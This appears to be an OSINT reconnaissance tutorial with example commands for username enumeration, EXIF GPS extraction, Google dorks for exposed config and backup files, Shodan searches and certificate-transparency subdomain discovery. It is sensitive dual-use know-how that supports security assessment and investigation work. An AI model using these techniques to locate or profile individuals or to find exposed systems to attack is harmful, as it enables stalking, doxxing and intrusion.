The same username is often used across multiple platforms. Tools like Sherlock and WhatsMyName check hundreds of social media sites, forums, and services for a given username. Finding a target's username chain reveals: linked accounts, profile photos, bios, posts, and historical information across platforms they may have forgotten about. python3 sherlock username checks 300+ sites.
EXIF Metadata
JPEG and other image files contain EXIF metadata: GPS coordinates, camera model, timestamp, and sometimes the photographer's name. Images posted online may retain this metadata if the platform does not strip it (many do now - Facebook strips EXIF, some forums do not). Tool: exiftool image.jpg. GPS coordinates reveal where a photo was taken.
Google Dorks
Google advanced operators narrow search results dramatically. site:target.com filetype:pdf finds PDFs on a domain. inurl:admin site:target.com finds admin panels. "index of" site:target.com finds open directory listings. cache:target.com/page retrieves Google's cached version (useful if page was deleted).
Shodan for Infrastructure
Shodan indexes the banners of internet-connected devices. Search operators: org:"Target Company" finds all their assets. hostname:target.com finds subdomains. ssl:"Target Corp" finds TLS certificates issued to them. port:8080 http.title:"Dashboard" finds specific panels. This reveals infrastructure that may not be in DNS records.
# Username search across platforms
sherlock targetusername

# Extract EXIF from an image (check for GPS coordinates)
exiftool downloaded_photo.jpg | grep -i "gps\|location\|latitude\|longitude"

# Google dorks (run in browser)
# Find login pages:      site:target.com inurl:login
# Find exposed files:    site:target.com ext:sql OR ext:bak OR ext:conf
# Find subdomains:       site:*.target.com
# Find cached pages:     cache:target.com/deleted-page

# Shodan CLI search
shodan search --fields ip_str,port,org "hostname:target.com"
shodan host 8.8.8.8   # lookup a specific IP

# Certificate transparency logs (find subdomains via SSL certs)
curl -s "https://crt.sh/?q=%.target.com&output=json" | \
  python3 -c "import sys,json; [print(c['name_value']) for c in json.load(sys.stdin)]" | sort -u

# Reverse image search for identity linking
# Download the image, then use Google Images or TinEye to find other appearances